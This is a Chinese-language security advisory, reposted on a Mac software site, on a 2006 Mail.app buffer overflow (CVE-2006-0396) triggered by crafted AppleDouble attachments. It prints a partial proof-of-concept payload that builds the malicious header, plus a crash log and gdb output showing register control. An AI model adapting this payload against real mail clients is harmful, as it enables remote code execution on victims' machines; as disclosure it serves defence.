苹果软件下载站

您的位置: 首页 > 苹果学院|技术教程 > 操作系统 正文

Apple Mac OS X邮件消息附件远程缓冲区溢出漏洞


作者: 加入时间: 2006-03-16 23:01:59 来源: 绿盟科技 阅读: 网友评论
  •   
 1/2    1 2 ›› ›|

中国苹果用户网,www.MyMac.com.cn
发布日期:2006-03-13YVW苹果软件下载站
更新日期:2006-03-14YVW苹果软件下载站
YVW苹果软件下载站
受影响系统:
Apple Mac OS X 10.4.5 Update 2006-001
描述:
BUGTRAQ  ID: 17081YVW苹果软件下载站
CVE(CAN) ID: CVE-2006-0396YVW苹果软件下载站
YVW苹果软件下载站
Apple Mac OS X是苹果家族电脑所使用的***作系统。YVW苹果软件下载站
YVW苹果软件下载站
Apple Mac OS X的2006-001安全更新存在缓冲区溢出漏洞,攻击者可能利用此漏洞在机器上执行任意指令。YVW苹果软件下载站
YVW苹果软件下载站
在安装Apple的2006-001安全更新后,Mail.app中存在缓冲区溢出漏洞。攻击者可以发送包含有AppleDouble头信息的特制MIME封装Macintosh文件来触发这个漏洞。例如:YVW苹果软件下载站
YVW苹果软件下载站
"\x00\x05\x16\x07".     # AppleDouble Magic NumberYVW苹果软件下载站
"\x00\x02\x00\x00".     # Version 2YVW苹果软件下载站
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".    # 16 Bytes of fillerYVW苹果软件下载站
"\x00\x03\x00\x00".     # Number of entries (3)YVW苹果软件下载站
"\x00\x09\x00\x00".     # Entry ID 9 is for 'Finder Info'YVW苹果软件下载站
"\x00\x3e\x00\x00".     # Start of Finder Info data is at file offset 0x3eYVW苹果软件下载站
"\x00\x0a\x00\x00".     # Length of Finder Info is 0x0a or 10YVW苹果软件下载站
"\x00\x03\x00\x00".     # Entry ID 3 is for 'Real Name'YVW苹果软件下载站
"\x00\x48\x00\x00".     # Start of Real Name data is at file offset 0x48YVW苹果软件下载站
"\x00\xf5\x00\x00".     # Length of Real Name is 0xf5 or 245YVW苹果软件下载站
"\x00\x02\x00\x00".     # Entry ID 2 is for 'Resource Fork'YVW苹果软件下载站
"\x01\x3d\x00\x00".     # Start of Resource Fork is at file offset 0x013dYVW苹果软件下载站
"\x05\x3a\x00\x00".     # Length of Resource fork is 0x053aYVW苹果软件下载站
"\x00\x00\x00\x00".     # <null> fillerYVW苹果软件下载站
"\x00\x00\x00\x00".     # <null> fillerYVW苹果软件下载站
"A" x 226 . "$retaddr" x 3 . "zzz.mov." . # remember this length is hard coded above.YVW苹果软件下载站
...YVW苹果软件下载站
YVW苹果软件下载站
如果Mail.app收件箱中收到了有上述首部的消息的话,用户就只能看到Real Name项所提供的名称的前11个字符,在这个例子中是“AAAAAAAAAAA...mov”。其他例子还可能包括“SuperTastey...mov”或“NakedChicks...mov”等。YVW苹果软件下载站
YVW苹果软件下载站
如果双击了附件文件,就会导致以下dump:YVW苹果软件下载站
YVW苹果软件下载站
Date/Time:      2006-03-04 10:35:32.472 -0500YVW苹果软件下载站
OS Version:     10.4.5 (Build 8H14)YVW苹果软件下载站
Report Version: 4YVW苹果软件下载站
YVW苹果软件下载站
Command: MailYVW苹果软件下载站
Path:    /Applications/Mail.app/Contents/MacOS/MailYVW苹果软件下载站
Parent:  WindowServer [64]YVW苹果软件下载站
YVW苹果软件下载站
Version:        2.0.7 (746.2)YVW苹果软件下载站
Build Version:  1YVW苹果软件下载站
Project Name:   MailViewerYVW苹果软件下载站
Source Version: 7460200YVW苹果软件下载站
YVW苹果软件下载站
PID:    271YVW苹果软件下载站
Thread: 0YVW苹果软件下载站
YVW苹果软件下载站
Exception:  EXC_BAD_ACCESS (0x0001)YVW苹果软件下载站
Codes:      KERN_INVALID_ADDRESS (0x0001) at 0x41414140YVW苹果软件下载站
YVW苹果软件下载站
在gdb可以看到有几处溢出:YVW苹果软件下载站
YVW苹果软件下载站
(gdb) btYVW苹果软件下载站
#0  0x41424344 in ?? ()YVW苹果软件下载站
Cannot access memory at address 0x41424344YVW苹果软件下载站
Cannot access memory at address 0x31313131YVW苹果软件下载站
Cannot access memory at address 0x41424344YVW苹果软件下载站
Cannot access memory at address 0x41424344YVW苹果软件下载站
#1  0x41424344 in ?? ()YVW苹果软件下载站
Cannot access memory at address 0x41424344YVW苹果软件下载站
Cannot access memory at address 0x41424344YVW苹果软件下载站
Cannot access memory at address 0x31313131YVW苹果软件下载站
warning: Previous frame identical to this frame (corrupt stack?)YVW苹果软件下载站
Cannot access memory at address 0x41424344YVW苹果软件下载站
Cannot access memory at address 0x41424344YVW苹果软件下载站
Cannot access memory at address 0x31313139YVW苹果软件下载站
YVW苹果软件下载站
这样就控制了r0、pc、lr和一半的r31。YVW苹果软件下载站
YVW苹果软件下载站
(gdb) i r $r0 $pc $lr $r31YVW苹果软件下载站
r0             0x41424344       1094861636YVW苹果软件下载站
pc             0x41424344       1094861636YVW苹果软件下载站
lr             0x41424344       1094861636YVW苹果软件下载站
r31            0x18b3030        25899056YVW苹果软件下载站
YVW苹果软件下载站
成功利用这个漏洞的攻击者可以远程执行任意指令。YVW苹果软件下载站
YVW苹果软件下载站
<*来源:Kevin Finisterre (dotslash@snosoft.comYVW苹果软件下载站
  YVW苹果软件下载站
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=114235372215398&w=2YVW苹果软件下载站
*>YVW苹果软件下载站
中国苹果用户网,www.MyMac.com.cn
苹果软件下载

大家一起将本文加入各大网摘 [ 你摘 ] [ 亿友响享 ] [ 新浪ViVi ] [ 365KEY ] [ 加加文摘 ] [ YouNote ] [ 博彩 ] [ 天极网摘 ] [ 和讯网摘 ] [ Poco ] [ 网摘 ]我要摘
现有条评论 | 更多评论..
我要发表看法
用户名: 密码:
验证码: 匿名发表(无需注册)
    马上成为会员,免费注册
  • ※ 评论注意事项:
  • 您的评论将在管理员审核后才会显示。
  •   
  • 不是苹果软件下载站会员或未登陆发表评论,评论人名字显示为匿名。
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规。
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任。
  • 本站管理人员有权保留或删除评论中的任意内容。
  • 参与本评论即表明您已经阅读并接受上述条款。
申明:本站所有资源均为网上搜集,旨在为中国苹果用户享受苹果电脑的最新技术贡献力量,共同推进苹果电脑在中国的发展和普及。若有侵犯您的相关权益,请与我们联系尽快处理。相关文章不构成对您的投资建议,责任自负!
 

热点推荐




排行榜
苹果新闻咨询,更多精彩在首页
苹果新闻咨询,更多精彩在首页,
客服QQ: 36870519 广告联系QQ: 394709249 站长信箱 给我们提意见 网站地图
关于我们 - 联系方法 - 招聘信息 - 其他服务 - 相关法律 - 帮助中心
© 2005-2007 MacDown.Com Some Rights Reserved
湘ICP备05009763号